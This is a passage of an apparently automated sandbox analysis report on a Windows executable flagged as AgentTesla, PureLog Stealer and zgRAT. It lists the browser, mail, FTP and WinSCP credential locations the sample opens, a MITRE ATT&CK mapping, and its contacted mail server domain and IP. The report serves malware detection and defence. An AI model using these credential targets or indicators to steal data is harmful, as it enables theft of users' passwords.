Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Users\user\Desktop\PO23100076.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO23100076.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 0.2.PO23100076.exe.35f88d8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO23100076.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.37f7348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2487084327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO23100076.exe.67b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match

File source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\PO23100076.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\PO23100076.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\PO23100076.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\PO23100076.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO23100076.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO23100076.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 0.2.PO23100076.exe.35f88d8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO23100076.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.37f7348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2487084327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO23100076.exe.67b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match

File source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	1 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO23100076.exe	45%	ReversingLabs	ByteCode-MSIL.Trojan.Genie8DN
PO23100076.exe	47%	Virustotal		Browse
PO23100076.exe	100%	Avira	HEUR/AGEN.1310026
PO23100076.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://mail.mbarieservicesltd.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.mbarieservicesltd.com	199.79.62.115	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO23100076.exe, 00000000.00000002.1273050070.00000000025D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.mbarieservicesltd.com	PO23100076.exe, 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.79.62.115	mail.mbarieservicesltd.com	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586625
Start date and time:	2025-01-09 12:40:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO23100076.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@11/6@3/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 51 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:41:01	API Interceptor	38x Sleep call for process: PO23100076.exe modified
06:41:03	API Interceptor	16x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
199.79.62.115	Quote_8714.exe	Get hash	malicious	AgentTesla	Browse
	PO82200487.exe	Get hash	malicious	AgentTesla	Browse
	ORDER#023_2024.exe	Get hash	malicious	AgentTesla	Browse
	QFEWElNtpn.exe	Get hash	malicious	AgentTesla	Browse
	SoA_14000048_002.exe	Get hash	malicious	AgentTesla	Browse
	Quote 000002320.exe	Get hash	malicious	AgentTesla	Browse
	LPO-2024-357.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Quote5000AFC.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	Quote1000AFC.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	Quote 40240333-REV2.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.mbarieservicesltd.com	Quote_8714.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	PO82200487.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	ORDER#023_2024.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	QFEWElNtpn.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	SoA_14000048_002.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	Quote 000002320.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	LPO-2024-357.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	Quote5000AFC.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	199.79.62.115
	Quote1000AFC.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	199.79.62.115

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	http://www.technoafriwave.rw	Get hash	malicious	Unknown	Browse	207.174.214.183
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.115
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	YinLHGpoX4.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	103.53.42.63
	v4BET4inNV.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
	InvoiceNr274728.pdf.lnk	Get hash	malicious	LummaC	Browse	208.91.198.106

Process:	C:\Users\user\Desktop\PO23100076.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugei/ZM0Uyus:lGLHxvCsIfA2KRHmOugA1s
MD5:	53E51A711DEB8FFE6A8D0809822F7B76
SHA1:	F555FAAFECE73CF7A4C24E1AE7BDDB04DD6795F9
SHA-256:	D25DA2C34AFF2489A76C91F568704C7854667DF6EB2907B13C5ED0CDF6D2A3AD
SHA-512:	FADA0DFC65D1F0D8669F7C110DCF261EF6F2DCA27B525A79FDF3BD0861E0EC8A5880E20BB2FF28592F1473D90CE93A707FEA63535D1782E5838A4F63B009B3CA
Malicious:	false
Reputation:	low
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjlooxe0.ea0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsa23n4z.42n.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjhcosnx.v5q.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqwcyacm.xrf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9068258043183075
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO23100076.exe
File size:	671'744 bytes
MD5:	abef12c0ec6c52759f2cd9cc5402e593
SHA1:	5f8d0e0b219578e9bf15ebb85b36de1d3d951e6f
SHA256:	5b2d21f50ea195e247b45b8330c18acfd0f71e146fe40489ee8301c7045daf04
SHA512:	83a9b9097e1eb1ec16f18a310a8c48eccf92cd4206cacefd1dee01219cd82c81f3f32d1eabbf1b88c3cc71fb3e5a226c5bee7d6fd4174a088a32cae8b772c26c
SSDEEP:	12288:4siyJ/iRs7N27Z84ScUducRb8TllLXer4XG6OXDsSPMSH+KE:t5iR6gaclseXNGBDLBxE
TLSH:	32E4124EAD7AA778D15D8F7FD213244D4079AE03E602F36E5DCA0EE40F35608C69E682
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.g.....................*......n2... ........@.. ....................................`................................

File Icon


Icon Hash:	33362c2d36335470

Static PE Info

General

Entrypoint:	0x4a326e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677F6CB0 [Thu Jan 9 06:29:04 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
